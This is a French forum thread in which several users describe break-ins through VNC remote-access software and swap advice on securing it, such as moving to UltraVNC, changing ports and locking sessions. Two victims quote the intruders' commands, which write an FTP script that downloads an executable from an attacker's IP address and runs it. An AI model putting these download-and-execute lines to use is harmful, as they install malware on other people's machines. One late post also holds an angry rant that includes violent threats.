Reprise du message précédent :

 
 
comment et ou son les log?
merci d'avance

clic droite sur POSTE DE TRAVAIL / GERER / dans EVENEMENTS puis SYSTEM ou APPLICATION
 
Mais comme ça date a lheure quil est les logs ont surement du disparaitre

Bon je te répond pck j'ai fini par trouver (personne n'a voulu me répondre !)
tu ouvre l'observateur d'évenements (exécuter/ eventvwr)
tu vas dans applications
affichage / trier
Tu tri par application (winvnc ...)  
Voilà l'ensemble de tes connexion via VNC.
 
Have fun

Cela reviens a réécrire ce que j'ai dit, mais c'est mieux dictée

badze --> dsl mon chou j'avais pas vu ta réponse .

meme probleme hier ...
 
une connexion FTP qui se lance dans le cmd pour rappatrier un fichier exe
 
j'avais installé la version 4.1.1, je savais pas que la 4.1.2 était sortie
Ce qui m'embette c'est que j'ai formatté mon PC le 2 janvier, et que j'avais vnc en version 4.1.1 depuis au moins 1 an sur mon PC, et que donc je peux plus vérifier les logs.
 
Mais la connexion avec l'histoire du ftp et de l'exe a eu lieu le 3 janvier (cad hier), j'ai vu le mec le faire sous mes yeux ...
 
donc je vais verifier l'obs d'evenement ce midi.
 
qqun peut me donner la marche a suivre pour récuperer le max d'info sur  l'IP qui sera concernée (lieu de l'ip surtout pour voir si c'est près de chez moi) ?
 
merci !

bon j'ai les messages de l'obs d'evenements.
 
avec 3 ips diférentes ...
 
mais selon l'heure, je sais l'ip qui s'est connectée sous mes yeux
 
mais bon je vais pas en faire grand chose a priori

J'ai également 3 personnes de mon entourrage qui ont eu de la visite via VNC 4.1.8, dont sur une ont lui à effacé ces documents.... pourtant les accès été protégés par mot de pass.
 
Pour ma part, j'ai tous les jours des tentatives de scan sur le port 5900.

pour plus de protection, change le port, et met un mot de passe à l'ouverture de session windows, que le pc se lock à chaque screensaver.

ce que j'ai fait :
 
-changer de version de VNC (thightVNC on vera bien )
-penser a locker ma session administrateur en partant
-par contre j'ai laisser le port de base, de toute façon le mec qui veut rentrer il va scanner tous les ports donc bon ...
 
on vera si ça suffit

Salut,
 
J'ai eu la même mésaventure, hier vers 14h...
Tranquillou, j'avais mangé dehors, qd en rentrant chez moi, je vois l'icone de Realvnc 4.1 active...
Je commence à vraiment m'inquiété quand je vois le pointeur qui bouge tout seul...  
Je coupe aussi sec la session vnc, mais tres rapidement, je remarque que l'icone redevient active... Je n'arrive plus à prendre le controle et le pc se bloque et plante...
 
Je redemarre en mode sans echec, et je découvre que mon AV est désactivé, que mon firewall avait  été supprimé (j'avais pas mis de mdp, ni sur l'un, ni sur l'autre)..
J'ai remarqué que mon S.AL.A.U.D s'était installé tranquillou un petit prog (op.exe).
Je réinstalle mon AV et je reparametre mon Firewall, puis je passe un coup de scan avec Kaspersky + Spybot + spysweeper+ ccleaner+adware, je prends soin de désinstaller realvnc et je relance en mode normal. A priori, plus de bestiole, mais ce matin, apres lancé DC++, mon AV s'exite en découvrant à nouveau op.exe, dans le dossier de telechargement de DC++. Simple coincidence ou pas, j'ai mis à jour ma version de DC++, j'ai fais l'update de windows 2000...
 
Mais pour l'heure, je n'ai toujours réinstaller de version de VNC... Je flippe un peu!!!
 
J'avoue que j'avais remarquer pas mal de conncetion sur VNC (grace au log en direct de Kerio) mais ne voyant jamais l'icone devenir je pensais que cela été de simple tentative...
Je ne sais pas si c par brute force (mot de passe de 8 caractéres), mais j'ai des tentatives qui ont été loggés sur 1 mois pour environ 1000 à 1500 tentatives (je ne sais pas si elles ont abouties, je ne sais pas tellement lire le fichiers de log de windows)....
 
Voila

si ca interresse quelqu'un,
vous pouvez conserver vnc avec une plus grande securité,
utilisez pour ca ultravnc
un peu mieux securisé que realvnc
il integre une authentification windows (login/password) que real ne possede pas...
il integre egalement des focntions qu'il est le seul a avoir
comme un driver video dédié permettant d'accelerer les affichages distants
ca devrait limiter la casse
http://www.ultravnc.fr/

 
 
Trés intéressant en effet, mais j'aurais deux/trois petites questions:
 
- Est-il gratuit? A priori, oui... mais il semble que la dernière version date du mois de novembre. N'est ce pas un peu risqué?
 
- Il semble plus complexe à prendre en main que RealVnc... Existerait il un petit Tuto pour les newb comme moi...
 
- Peut-on utiliser IE ou Firefox pour y acceder (port 5800 par defaut sur VNC). Ce qui est pratique a disyance et qui evite d'installer un viewer sur poste a distance)
 
Merci.
 
PS: que vaut il par rapport à thight vnc?

- oui il est gratuit, quant à la version, il est plus recent que realvnc... octobre 2006 vs mai 2006

- certes un peu plus  complexe. Pour la config, le site de ultravnc est plutôt bien fait
http://www.ultravnc.fr/install/configuration.html

- oui, il accepte les requetes sur le port 5800 pour les navigateurs...(quant au viewer, vu la taille de l'exe qui n'a pas besoin d'etre installé, sur une clef USB ca le fait)

par rapport  thight vnc , ultravnc est le seul serveur vnc utilisant l'authentification MSLOGON et MSLOGON II
pour info MSLOGON permet de specifier des utilisateurs windows combinés à leurs mots de passe. pour se connecter au serveur.
en clair, quand tu te connecte au serveur, il ne te demande plus un password,mais un utilisateur windows connu ainsi que son mot de passe (voir la page de config que je t'ai indiquée.)
depuis la version 1.0.2, les users/passwords sont transmis en mode securisé. et le viewer 1.0.2 reste compatible avec un serveur vnc quel qu'il soit (tight, ultra, real, unix)
je l'utilise au bureau ainsi sur le net sans problemes...

Oui et non. La version Entreprise de RealVNC permet l'authentification Windows.

Ok merci pour ces explications...
ca me donne presque envie de replonger...
 
Je vais etudier cette solution.
 
J'ai pas encore lu les explication d'installation sur le site, mais pouvez vous m'indiquer s'il est possible de changer le port par défaut pour l'utilisation via browser (5800) pour n'importe quel autre port? je suppose que meme par browser je peux configurer un mode securisé par mslogon?
 
cela suppose donc que je creer un profil (admin ou utilisateur) avec un mdp qui me sera demandé a chaque ouverture de session windows?

j'ignorais pour la version enterprise...

EDIT: en meme temps j'ai pas cherché, elle est payante alors que ultravnc...

pour le port du browser, oui tu peux le changer dans la config du serveur...
pour les comptes c'est ca...
en fait, il utilise pas des comptes mais des groupes
par defaut tout utilisateur membre du groupe administrateurs (local) peut se connecter.
si tu veux des utilisateurs non admins, il suffit de creer un group vncusers par ex. puis creer des comptes que tu places dans le groupe vncusers
(tout ca sous windows gestion des utilisateurs)
dans la config de vncserver, tu ajoute dans la page mslogon, ton groupe vncusers et ca roule...
par ex au bureau j'ai fait ca:
mes collegues et moi du service info utilisons le login administrateur/son password
pour un autre service d'assistance, j'ai créé un groupe vncassist auquel j'ai rattaché les 4 gars du service
quand eux se connectent sur un poste, ils utilisent leurs propres login/password pour l'authentification vnc
dans la page mslogon j'ai
groupe 1 administrateurs
groupe 2 vncassist
j'ai coché les cases local et domaine
ainsi un admin qu'il soit local ou du domaine peut se connecter à un serveur vnc.

 
 
Tu veux pas venir me le configurer, çà a l'air simple à te lire
bon, faut que je m'y mette afin de mieux piger mais c'est clair que çà a l'air plus sure que real... ce qui sera pas un mal en soit!!!
 
en tout cas merci pour ces explications

Bonjour,
 
Voila je viens juste plussoyer les divers témoignages d'intrusion via VNC.
 
Depuis quelques temps j'ai pu constater plusieurs tentatives réussies de connection et prise en main de mon PC via VNC. J'ai chaque fois changé de MdP et scanné le PC.  
 
Après étude des trames ip qui partaient et arrivaient sur le PC j'ai constaté que le MdP n'est pas crypté et apparait en clair dans la trame... j'ai donc pris la décision d'arreter de m'en servir.
 
Dernièrement j'ai eut à nouveau besoin d'un soft de prise de controle à distance. Changeant d'IP toutes les 24H  je me suis dit "Bah c'est juste pour une journée".
 
Malheureusement, le soir même alors que tout semblait normal, j'ai constaté que mon dossier "mes documents" avait été effacé (avec photos, comptes perso etc...). certains logiciels avaient été également altérés comme Emule par exemple.
 
J'ai pu retrouver la trace de l'execution d'une commande (a quelques caracteres pres) :
krcmd.exe /c del echo open 90.0.0.116 17413 >iecho quit >>i&ftp-n -s i&853.exe &del i&exit
 
Apres un reboot, impossible de redémarrer le PC (sous XP à jour). J'avais le fameux message : ntldr manque. malgré de multiples essais de bootfix et autre copies de fichier en mode console, rien à faire pour relancer mon systeme.
 
De plus, le syteme tournait sur un array SCSI en mode striping dont l'un des disques semblait avoir des données corrompues.
 
Au final, je n'ai pu que formater l'ensemble et réinstaller un systeme complet.
 
Le mal est fait, cependant je me demandait si quelqu'un d'autre avait subit les mêmes mésaventures. je m'inquiéte également sur la nature des informations ayant pu être consultées concernant mes comptes bancaires et autres. Enfin, je me demande à quoi correspond cette commande que j'ai pu intercepter.
 
Voila fin du pavé, merci de m'avoir lu et merci d'avance de vos éventuelles suggestions.
 
Bye

depuis sa version 1.0.2, ultravnc utilise des mots de passes cryptés...

 
merde c'est vraiment moche    
 
la commande était surement faite pour te faire télécharger un trojan ou autre (le .exe)

enegarm : Avec quelle version de VNC ?

J'utilisai la version suivante :
 
Real Vnc 4.1.2 free edition
Built on 12 2006
 
Quelque chose me surprend tout de même, j'accedai à mon PC à travers un routeur que j'avais configur pour ne laisser passer les trames sur le port 5900 mais uniquement du poste à partir duquel je controllais mon PC et qui a une IP fixe.  
 
En théorie je ne vois pas comment l'intrus a pu contourner cette règle de mon pare feu....

Pour ceux qui sont sous XP pro le conseille d'activer le bureau a distance plutot que VNC.

 
Ta version n'est pas vraiment récente, change là au plus vite (failles), installe la dernière en date (4.2.9).

 
Le bureau à distance de crosoft ne permet pas à la personne de voir se que tu tripotes sur son PC, c'est son gros défaut

normal c'est un bureau à distance, comme si tu était devant, et c tout

Bonjour tt monde    
 
J ai ete victime moi aussi de ce truc via VNC   et comme je suis de nature prudente j ai eu le temps de tt deconnecter    
je vous met la ligne de commande car je trouve sa marrant moi cmd /c echo OPEN 82.229.XXXXXX 15148>x&echo GET 84785_norton.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_norton.exe&del x&exit ...j ai reperé l adresse ip du monsieur peu scrupuleux qui a essaye d entré sur ma machine  via VNC ...comme si s agit d une adresse FREE.FR j ai decide d envoyer le tt a l operateur   et toc
donc wait and see.. j attends avec impatience de voir la reaction de FREE.FR je ne pense pas que l adress indiquer ds l indicateur d evenement soir la bonne...(ss windows)Apres un scan de mon pc je trouve a ma gde surprise un trojan restore.exe
 
Je tiens a remercier les gens qui perdent leur temps à hacker les pauvres consommateurs que nous sommes...Avoir du savoir cest bien mais  l utiliser a des fin de destruction je trouve sa pitoyable et lamentable...

Bonjour,
 
qui te dit que cette IP n'est pas elle-même contrôlée par un VNC hacké contrôlé par un autre VNC contrôlé par un autre VNC hacké?
Les IP en clair ...   Edite-là STP, la personne qui a cette IP n'y est peut-être pour rien!

 
 
  oop desolee je savais meme pas que cetait possible je vais modifier mon post   j ai mis des XXX a la fin
voilou ...

Salut.
Franchement je vous conseille UltraVNC, il est très bien et me parait bien plus sur que le VNC d'origine.
C'est celui que j'utilise chez moi pour administrer mon poste fixe depuis mon portable, en changeant le port et avec un mot de passe fort c'est nickel

Bonjour,
 
J'ai rencontré le meme probleme d'intrusion via vnc sur mon pc malgré mon MDP 15 caractères ultra complexe. Si aucun sniffer n'est utilisé ces intrusion beneficient certainement de pass-through ou de bypass sur la procedure d'identification.
 
- 1ere intrusion de ce type en 2006 via vnc et en shell dos, j'ai supprimé 1 caractere dans la commande que "l'employé-hacker" tapait en direct à la main en remote control graphique via vnc dans mon invité de commande dos. La commande n'a donc pas aboutie. Un fois vnc desactivé, plus de probleme notable.
 
-  2ème intrusion de ce type aujourd'hui... à 14h30 j'installe ma nouvelle freebox delaissant mon firewall comme un créa trop pressé. En revenant de course à 19h ma souris bougeais toute seule, le hacker se gavait, commandes dos desactivation/activations de service à sa guise via computer management  j'ouvre donc un notepad et ecris dedans "F#@k u" , il m'efface en direct ce texte le remplaçant par "u S#@ks" ... je déconnecte donc le rj45 et me repenche sur ces broutilles d'avant guerre assez mécontent et demande une aide a mon fai pour tracer l'ip ... rien a faire. Ayant travaillé pour de nombreux prestaires malhonnetes je m'interroge donc sur la provenance de cette agression... et quelle vulgarité dans les moyens d'actions. Ayant infligé de mémorables défaites sur des wargames réputés et ayant lutté 9mois contre une hierachie arbitraire ignorant le code du travail, les sources possibles de cette agression sont dures à déterminer avec sureté; Néanmoins le lociel de remote control en freeware à un successeur tout aussi reputé dans la meme societe je me suis dis que celle-ci embauche certainement un prestaire pour inciter/forcer à l'utilisation du petit frère.  
 
Donc sur winxp comme win7 un rdp parfaitement secure est disponnible, il est meme de meilleur qualité que ces logiciels à stratégie commerciale douteuse! rdp + telnet restent donc le moyen le plus secure de controler son reseau a distance. Apres test le iphone est nikel en telnet sur du shell MS et je suis toujours fan de mon interface utilisateur en telnet avec de l'ascii art, des menus et boucles appelées dans le c:\windows\system32\logon.cmd
 
Ce comportement de barbouses nauséabondes apres 15 ans de metier m'a degouté de continuer mes recherches sur php xml as shell powershell et je quitte la profession avec plaisir car tout ces capo qui se prennent pour des james bonde ne sont pas du "genre humain" et si le drame de la 2eme guerre n'était pas la pour leur rappeller ce dont ils sont réellement capable, nous seriont encore menacer de comtempler leurs charniers qu'ils justifieraient par des statisques qu'ils ne maitrisent pas et qu'ils érrigent en outils de torture.
 
L'argent est l'ennemi pulique n°1 et permet toute les dérives. Tout charnier à été financé. Une passerelle philosophie/ingenieurie est necessaire avant que la technologie ne nous permette plus de retour en arriere.
Quand aux informaticiens qui pratiquent ce genre de hacking, qu'ils restent bien cachés s'il ne veulent pas retrouver leur dentier fossiliser dans l'asphalte!
 
Yapamordum (pour l'instant)

Ça m'était arriver une fois sur mon HTPC l'année dernière,
 
Pendant que je regardé un film, pof, le plein ecran se vire et je voie le curseur commencer a se balader.
J'ai regardé faire tranquillement, le tipiak a commencer a balancer tout ces scripts de bot c'était assez fun (ubuntu 10.04)    
 
J'ai un peu attendu defois qu'il se logue sur une interface web/irc pour gérer la supposé ferme de bots histoire d'aller y faire mumuse moi aussi après son passage mais raté    
j'ai ausi essayer de lui parler avec le bloc note en lui disant que c'était vilain de pirater mon mot de passe admin/007 et que j'allais appeler pascal le grand frère s'il continuer.

ce up de fourbe

wai mais yapamordum a fait pire que moi donc je me le suis permis